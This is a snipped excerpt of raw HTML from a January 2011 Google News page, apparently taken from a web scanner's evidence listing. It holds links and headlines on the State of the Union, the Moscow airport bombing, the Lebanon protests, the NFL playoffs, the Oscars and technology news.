<div id="rhc-toggler" class="rhc-toggler"><img id="rhc-toggler-image" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" class="icon rhc-toggler-icon expanded"></div>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.ctv.ca/CTVNews/World/20110123/obama-state-union-110123/" class="usg-AFQjCNH02kUfthKCE92PXDBgC02gic3LZg " title="CTV.ca"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/l2LZVd_dX5rO8M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.ctv.ca/CTVNews/World/20110123/obama-state-union-110123/" class="usg-AFQjCNH02kUfthKCE92PXDBgC02gic3LZg "> CTV.ca </a>
...[SNIP]...
<h2 class="title sel"> <a target="_blank" class="usg-AFQjCNE7Vwk-Qa_sZ9z72Cn2EtSMJI2j4A " href="http://www.reuters.com/article/idUSN2525117520110125" id="MAA4AEgAUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=pUzMhGLMFgQ">Video: 
Obama to Focus on Economy in Tuesday Address
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.cbsnews.com/stories/2011/01/25/politics/main7280843.shtml" target="_blank" class="usg-AFQjCNHHtSqbZ3-3cRPJEgu_uvDA0zfmGg " id="MAA4AEgAUAFgAmoCdXM">Obama to Seek Balance before Divided Congress</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFd3L_NczRkYYaSyi6l4TDxyz_MPQ " href="http://www.npr.org/2011/01/25/133204546/the-root-why-obamas-speech-needs-to-play-it-safe" id="MAA4AEgAUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGUsVQVKmIv3zvO5QqlgBI0VTK7Bg " href="http://feeds.nytimes.com/click.phdo?i=c37a68a9d6c79074b075c0a6b2ae297e" id="MAA4AEgAUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH4X2RBdB48v8y-fxtdopp5GU1JnQ " href="http://abcnews.go.com/US/president-obama-delivers-state-union-tonight-issue-important/story?id=12747572" id="MAA4AEgAUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGcxqmcTJAqTpQk5GlOyJwheNHNzA " href="http://content.usatoday.com/communities/theoval/post/2011/01/obamas-day-state-of-the-union-1/1" id="MAA4AEgAUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://montreal.ctv.ca/servlet/an/local/CTVNews/20110125/airport-bomb-moscow-110125/20110125/?hub=MontrealHome" class="usg-AFQjCNH-T7c0pyCgzwM9w1R8PGkZBCVj3w " title="CTV.ca"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/pdw41_LrPaNSwM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://montreal.ctv.ca/servlet/an/local/CTVNews/20110125/airport-bomb-moscow-110125/20110125/?hub=MontrealHome" class="usg-AFQjCNH-T7c0pyCgzwM9w1R8PGkZBCVj3w "> CTV.ca </a>
...[SNIP]...
<h2 class="title sel"> <a target="_blank" class="usg-AFQjCNHsV0WVSMU7BivakTp-qBPi9CJjwA " href="http://en.rian.ru/analysis/20110125/162296627.html" id="MAA4AEgBUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=bzno493XK5M">Video: 
Terror Fears: Savage explosion at Domodedovo airport shocks Russia
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.bbc.co.uk/news/uk-12278369" target="_blank" class="usg-AFQjCNEuOgHgFhSFsE9OYmd5a2HRm0MTEA " id="MAA4AEgBUAFgAmoCdXM">Moscow bombing: British victim due to get married</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGxTYZNqx9Pqfs5kxkoLCGrHwTuKw " href="http://www.csmonitor.com/World/terrorism-security/2011/0125/Moscow-terrorist-attack-blamed-on-airport-security-lapses" id="MAA4AEgBUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFXU8j1cMZh_AGcRx4h9byCKipUYA " href="http://abcnews.go.com/Business/wireStory?id=12755356" id="MAA4AEgBUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEf884Is-krOtFly-f6dap_-WE5pg " href="http://www.ajc.com/business/moscow-blast-may-cause-815105.html" id="MAA4AEgBUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.msnbc.msn.com/id/41247842/ns/world_news-mideastn_africa/" class="usg-AFQjCNEObXCSMyFFg23_CLj7q-3Ic66PiQ " title="msnbc.com"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/sEKWE5k1cQjO7M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.msnbc.msn.com/id/41247842/ns/world_news-mideastn_africa/" class="usg-AFQjCNEObXCSMyFFg23_CLj7q-3Ic66PiQ "> msnbc.com </a>
...[SNIP]...
<h2 class="title sel"> <a target="_blank" class="usg-AFQjCNGJCGMec4aAF6jsyMH0o3M9k_Higg " href="http://www.nytimes.com/2011/01/26/world/middleeast/26lebanon.html?src=mv" id="MAA4AEgCUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=OfNTrVD0N4c">Video: 
Day of Rage: Fire, gunshots, clashes in Lebanon's Beirut & Tripoli
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.cnn.com/2011/WORLD/meast/01/25/lebanon.protests/" target="_blank" class="usg-AFQjCNHmqKy1P9U2-7wDaUrIvCHi2wdhRQ " id="MAA4AEgCUAFgAmoCdXM">In Lebanon, angry protests as a new PM is named</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGjCYyjpabgS18o8SjBBmWqCFcd7Q " href="http://online.wsj.com/article/SB10001424052748704698004576103760527993764.html" id="MAA4AEgCUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFZAyGwNZT-1PI-dCnKg6q2PnxPoA " href="http://www.voanews.com/english/news/middle-east/Hariri-Supporters-Gather-for-Day-of-Rage-in-Lebanon--114537104.html" id="MAA4AEgCUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGkmWfO_v_jlzuW53qVhlIG_jalMQ " href="http://www.ynetnews.com/articles/0,7340,L-4018734,00.html" id="MAA4AEgCUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGP2Lx4HObwksI_VucgzX0JwKLidA " href="http://news.xinhuanet.com/english2010/world/2011-01/25/c_13706780.htm" id="MAA4AEgCUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
</div> <img class="chip nav-w" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-n" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-b" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-t" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-e" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-s" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-m" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://espn.go.com/nfl/notebook/_/page/lastcall1020/john-clayton-last-call" class="usg-AFQjCNHJ-UUXK3fpuPLIcgyQe2NAtYVDZA " title="ESPN (blog)"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/ze_Jah1aKnczKM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://espn.go.com/nfl/notebook/_/page/lastcall1020/john-clayton-last-call" class="usg-AFQjCNHJ-UUXK3fpuPLIcgyQe2NAtYVDZA "> ESPN (blog) </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNF1-j7B-WS6b4KS2j6SaVujbMit3Q " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/25/AR2011012501926.html" id="MAA4AEgDUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=NJLHvIL-G4M">Video: 
Packers Win but Bears' Cutler Grabs Headlines
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www2.tbo.com/content/2011/jan/24/250400/cutlers-passion-questionable-not-his-toughness/" target="_blank" class="usg-AFQjCNFizdGGZBlsZzU4lRWmIiomju7WDQ " id="MAA4AEgDUAFgAmoCdXM">Cutler's passion questionable, not his toughness</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHUrBKIcblqlwoyWEq8lYQAOjLyeA " href="http://www.wdel.com/story.php?id=31917" id="MAA4AEgDUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE-bVr9MRWtioD4FbW9m8rRv4jKwg " href="http://www.indystar.com/article/20110125/SPORTS03/101250341/Those-who-know-Cutler-well-have-his-back-over-injury?odyssey=tab%7Cmostpopular%7Ctext%7CSPORTS" id="MAA4AEgDUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHZToo71qS9mtu5zyHRWzSS8YWk6Q " href="http://www.myfoxchicago.com/dpp/news/metro/john-stone-car-salesman-fired-green-bay-packers-tie-chicago-20110125" id="MAA4AEgDUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG3z0n4wX_WIMMptgoaL-KE5N0xhw " href="http://beargoggleson.com/2011/01/25/chicago-car-salesman-fired-for-wearing-packers-tie/" id="MAA4AEgDUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.usatoday.com/life/movies/movieawards/oscars/2011-01-25-oscar-nominations-preview_N.htm" class="usg-AFQjCNFyRATycyqoonooqWdkAK0xpj1suQ " title="USA Today"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/tCst1ur0hPb3fM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.usatoday.com/life/movies/movieawards/oscars/2011-01-25-oscar-nominations-preview_N.htm" class="usg-AFQjCNFyRATycyqoonooqWdkAK0xpj1suQ "> USA Today </a>
...[SNIP]...
<div class="aa-inner"><a href="http://content.usatoday.com/communities/popcandy/post/2011/01/what-do-you-think-of-the-oscar-nominations/1" target="_blank" class="usg-AFQjCNF_4suxPRRgxXoa_8Zp5SHu3jf6jQ " id="MAA4AEgEUAFgAmoCdXM">What do you think of the Oscar nominations?</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.guardian.co.uk/film/2011/jan/25/oscars-colin-firth" target="_blank" class="usg-AFQjCNF7qCUzn_UOiBN60Cf4v4CoXreHbg " id="MAA4AEgEUAJgAmoCdXM">The King's Speech scores royal flush with 12 nods</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHod9JjR9y4F2FvohSndj5Y6BMBVw " href="http://www.chron.com/disp/story.mpl/ap/top/all/7396519.html" id="MAA4AEgEUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEsu-DnmHIBuFL0DwwwRk8Vd4hjlw " href="http://www.mtv.com/news/articles/1656582/2011-oscar-nominations.jhtml" id="MAA4AEgEUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEZ3l0V53faVCkMEw9KKd-PDkiE8w " href="http://www.cbsnews.com/stories/2011/01/25/entertainment/main7280739.shtml" id="MAA4AEgEUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHL90AF5QbOJ_4UIYIc-Ile0M2y9w " href="http://www.baltimoresun.com/news/sns-ap-us-oscar-nominations,0,4030183.story?track=rss" id="MAA4AEgEUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012400144.html" class="usg-AFQjCNE75OdmGa6wWboDK9ggLrhiJWVEAw " title="Washington Post"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/zzuaChiS-OW1xM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012400144.html" class="usg-AFQjCNE75OdmGa6wWboDK9ggLrhiJWVEAw "> Washington ... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEgD_IaVkDTWoies8fgQaFficXY0Q " href="http://msn.foxsports.com/nfl/story/Steelers-ground-Jets-head-to-Super-Bowl-XLV-80094778" id="MAA4AEgFUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=Dye1RPvkcB0">Video: 
Jets lose to Steelers in AFC championship game
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://pittsburgh.sbnation.com/pittsburgh-steelers/2011/1/25/1954878/2011-super-bowl-pittsburgh-connections-green-bay-coaching-steelers-packers" target="_blank" class="usg-AFQjCNFtPlMqUrlhqvDofcXKtm0xg2Mjtg " id="MAA4AEgFUAFgAmoCdXM">2011 Super Bowl: Pittsburgh Connections Dominate Green Bay Coaching Staff</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH-Kxlqid8b-IfRxyra4u0KauMIoA " href="http://www.nydailynews.com/sports/football/jets/2011/01/25/2011-01-25_rex_ryan_jets_proved_they_werent_ready_for_super_bowl_when_they_failed_to_gain_o.html?r=sports" id="MAA4AEgFUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFIhJoynuZBqroSpyNBnpnrbmCmGQ " href="http://www.locksmithsportspicks.com/super-bowl-45-betting-odds/" id="MAA4AEgFUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGMpJiNmDogxbdBXhcsuNwAd8h8ng " href="http://www.nytimes.com/2011/01/25/sports/football/25moments.html" id="MAA4AEgFUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHoxIksLdOiX2EP01Fp8STAYjKlTw " href="http://www.dallasnews.com/sports/super-bowl/20110124-melded-together-steelers-fans-share-special-bond-forged-in-fire.ece" id="MAA4AEgFUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.ctv.ca/CTVNews/World/20110117/middleton-wedding-dress-oldfield-110117/" class="usg-AFQjCNH4cbqwiireydgY7Zi2fXYqg181lQ " title="CTV.ca"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/iMpPYm2zLW2H9M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.ctv.ca/CTVNews/World/20110117/middleton-wedding-dress-oldfield-110117/" class="usg-AFQjCNH4cbqwiireydgY7Zi2fXYqg181lQ "> CTV.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGizn8FdbrlNoarxp9b2ChITIuSnQ " href="http://www.people.com/people/package/article/0,,20395222_20459577,00.html" id="MAA4AEgGUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://newsfeed.time.com/2011/01/25/working-girl-to-royal-housewife-kate-middleton-quits-her-day-job/" target="_blank" class="usg-AFQjCNEy23pIeiwJOGqBOnxw3QMGH9MKpg " id="MAA4AEgGUAFgAmoCdXM">Working Girl to Royal Housewife: Kate Middleton Quits Her Day Job</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFECASiQrBtdHvW_9W0yts5KDSoHA " href="http://www.dailymail.co.uk/news/article-1350151/Kate-Middleton-prepares-Royal-housewife-life-leaving-parents-business.html?ito=feeds-newsxml" id="MAA4AEgGUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFl2VrqsfwEp8U6iWvchJszI29KoA " href="http://travel.usatoday.com/destinations/dispatches/post/2011/01/london-businesses-are-pushing-royal-wedding-packages-souvenirs/139960/1" id="MAA4AEgGUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHHos6MO-HxbA1cqVFYOczn474tAA " href="http://www.reuters.com/article/idUSTRE70N73S20110124" id="MAA4AEgGUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/idUSTRE70M0EM20110125" class="usg-AFQjCNFTNRzPxDT-HAxe-GeQ6gLW_AJQjQ " title="Reuters"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/wxCcL8eCTK7UkM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/idUSTRE70M0EM20110125" class="usg-AFQjCNFTNRzPxDT-HAxe-GeQ6gLW_AJQjQ "> Reuters </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHF-80bO00nIupmnFw1092G1GWWCQ " href="http://www.guardian.co.uk/world/2011/jan/25/palestine-papers-refugees-south-america" id="MAA4AEgHUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=yQEnVIJmHvM">Video: 
Palestine Papers anger East Jerusalem residents
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://news.xinhuanet.com/english2010/world/2011-01/25/c_13706837.htm" target="_blank" class="usg-AFQjCNHtiSGBKgb8AJ3pLsUWCx1en_clvQ " id="MAA4AEgHUAFgAmoCdXM">Abbas says never up Jerusalem</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHohl3vOEbaeeKD18YoSOK366LIZg " href="http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12275942" id="MAA4AEgHUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNELlHb-F-z9krtQRtJ8LPf3lMtxZg " href="http://www.haaretz.com/news/diplomacy-defense/hamas-urges-palestinian-refugees-to-protest-over-concessions-on-right-of-return-1.339120" id="MAA4AEgHUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEe7t59kCLaZEPNgdIrx-d03Dyb5w " href="http://www.jpost.com/DiplomacyAndPolitics/Article.aspx?id=205147" id="MAA4AEgHUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEIR3qqw7II_X8azn_RfNVJcHt6tQ " href="http://gulfnews.com/news/region/palestinian-territories/pna-to-sue-al-jazeera-channel-1.751956" id="MAA4AEgHUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.zdnet.co.uk/news/application-development/2011/01/24/mozilla-outlines-firefox-do-not-track-tool-40091531/" class="usg-AFQjCNFhh7er7SVh-GkRPm4nIGuMglUXPw " title="ZDNet UK"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/KH3wcH3fa03OHM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.zdnet.co.uk/news/application-development/2011/01/24/mozilla-outlines-firefox-do-not-track-tool-40091531/" class="usg-AFQjCNFhh7er7SVh-GkRPm4nIGuMglUXPw "> ZDNet UK </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGuDbOaMWITubQMDQRm3Vh0Egtf8g " href="http://www.cnn.com/2011/TECH/web/01/25/do.not.track.features.fc/" id="MAA4AEgIUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.techtree.com/India/News/Mozilla_to_Add_Do-not-track_Feature_to_Firefox/551-114274-643.html" target="_blank" class="usg-AFQjCNFfT6geWCCP6E2QzH5FUqDG1X_6iQ " id="MAA4AEgIUAFgAmoCdXM">Mozilla to Add Do-not-track Feature to Firefox</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.switched.com/2011/01/25/google-mozilla-adding-new-do-not-track-features-to-browsers/" target="_blank" class="usg-AFQjCNERbSCK3kCQuoNkwZjlOSimSLZmSw " id="MAA4AEgIUAJgAmoCdXM">Google, Mozilla Adding New 'Do Not Track' Features to Browsers</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHKzocjpu5vlhh-D6N9fc595X4mmA " href="http://www.fudzilla.com/home/item/21654-firefox-google-chrome-adding-do-not-track-tools" id="MAA4AEgIUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNELbqLAIM8yn2z_8_-FVXf9K-dbYA " href="http://www.bbc.co.uk/go/rss/int/news/-/news/technology-12275750" id="MAA4AEgIUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFcQaqnZQeJ6RKQKdpso-J76DugIA " href="http://online.wsj.com/article/SB10001424052748704213404576100441609997236.html?mod=googlenews_wsj" id="MAA4AEgIUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHcZ0fugBcUA2k5qxjAGWVyS_21zQ " href="http://www.marketingpilgrim.com/2011/01/google-ad-track-blocker-%E2%80%9Ckeep-my-opt-outs%E2%80%9D-is-live.html" id="MAA4AEgIUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.straitstimes.com/BreakingNews/TechandScience/Story/STIStory_627942.html" class="usg-AFQjCNGALC7pTP_HmeRCjaHR1Jmr2aDqSg " title="Straits Times"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/oq6s9DrJF70jrM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.straitstimes.com/BreakingNews/TechandScience/Story/STIStory_627942.html" class="usg-AFQjCNGALC7pTP_HmeRCjaHR1Jmr2aDqSg "> Straits Tim... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGlOjCTDT0I5KjFM2nF9seR-UU1nA " href="http://www.allheadlinenews.com/briefs/articles/90032032?Heart%20disease%20costs%20expected%20to%20triple%20by%202030" id="MAA4AEgJUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://timesofindia.indiatimes.com/life-style/health-fitness/health/Lowering-BP-in-women-cuts-heart-disease-risk/articleshow/7361366.cms" target="_blank" class="usg-AFQjCNFVzg8Nh2UMpPqPxrXXGOK8ja_MPw " id="MAA4AEgJUAFgAmoCdXM">Lowering BP in women cuts heart disease risk</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.whec.com/news/stories/S1941039.shtml?cat=566" target="_blank" class="usg-AFQjCNE-xgnWt8tuHVa29gb4ru73IaOcRQ " id="MAA4AEgJUAJgAmoCdXM">Heart disease treatment costs expected to skyrocket</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFTF19UjawTG0U74K1vgENiWJteKg " href="http://www.businessweek.com/lifestyle/content/healthday/649165.html" id="MAA4AEgJUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE_rV0f77uJmyZiUMloBc2lXdf9Pw " href="http://www.webmd.com/hypertension-high-blood-pressure/news/20110124/heart-benefits-for-women-who-cut-hypertension" id="MAA4AEgJUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGYHaS-zthcCySdDAWNVHb4SLIrsw " href="http://ozarksfirst.com/fulltext?nxd_id=392206" id="MAA4AEgJUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG3XToTSrtKhlkI7xZ-Y6ypAF1H4g " href="http://www.msnbc.msn.com/id/41234780/ns/health-heart_health/" id="MAA4AEgJUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.siliconrepublic.com/digital-life/item/20087-iphone-5-and-ipad-2-may-use" class="usg-AFQjCNH19WnfEMcBXsW7low3TQ4dVVnAfg " title="Siliconrepublic.com"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/JQezVTDMGKi-tM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.siliconrepublic.com/digital-life/item/20087-iphone-5-and-ipad-2-may-use" class="usg-AFQjCNH19WnfEMcBXsW7low3TQ4dVVnAfg "> Siliconrepu... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFCBrtD7WCE0PtKw7H7t44smvuv5w " href="http://www.appleinsider.com/articles/11/01/25/apple_finalizing_wireless_e_wallet_for_iphone_5_ipad_2_report.html" id="MAA4AEgKUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://mashable.com/2011/01/25/apple-nfc-iphone-ipad/" target="_blank" class="usg-AFQjCNGm6-ErpYiEamahs9RkfVGAzI01dg " id="MAA4AEgKUAFgAmoCdXM">Apple to Add NFC Functionality to iPhone and iPad [REPORT]</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.mobileburn.com/news.jsp?Id=12601" target="_blank" class="usg-AFQjCNEWDXM8PnAha4yiIzgRne1A7thEHQ " id="MAA4AEgKUAJgAmoCdXM">Apple planning NFC mobile payment system for iPhone, iPad 2</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHW5C8tZea1E7rask8sdgGgqH1sqA " href="http://www.pcworld.com/article/217649/new_iphones_ipad_likely_to_become_ewallets.html" id="MAA4AEgKUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNESRVBr6N4Mw53zwxbWqMXsPJcc9w " href="http://www.bloomberg.com/news/2011-01-25/apple-plans-service-that-lets-iphone-users-pay-with-handsets.html" id="MAA4AEgKUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGtHdkHfBoAIG1s9jPpelMaz6s2AA " href="http://www.techtree.com/India/News/Next_iPhone_iPad_will_let_You_Make_Purchases/551-114271-893.html" id="MAA4AEgKUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHPeOouT9CckF0mUYysL730O7lrOg " href="http://www.ibtimes.com/articles/104716/20110125/apple-iphone-visa-mastercard-paypal-ebay-ipad-iphone-5-ipad-2-nfc-itunes-iad-google-google-checkout-.htm" id="MAA4AEgKUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.latimes.com/health/boostershots/la-heb-new-food-labels-20110124,0,7387257.story" class="usg-AFQjCNHIHuMYemJrbj1dujgRqym-0lbnUg " title="Los Angeles Times"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/KWy1eKrr9yjBVM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.latimes.com/health/boostershots/la-heb-new-food-labels-20110124,0,7387257.story" class="usg-AFQjCNHIHuMYemJrbj1dujgRqym-0lbnUg "> Los Angeles... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHIHuMYemJrbj1dujgRqym-0lbnUg " href="http://www.latimes.com/health/boostershots/la-heb-new-food-labels-20110124,0,7387257.story" id="MAA4AEgLUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.nacsonline.com/NACS/News/Daily/Pages/ND0125111.aspx" target="_blank" class="usg-AFQjCNEr5zGblJr5ydUyiba1wOen29-Mbw " id="MAA4AEgLUAFgAmoCdXM">Front-of-Pack Nutrition Labeling Initiative Launched</a>
...[SNIP]...
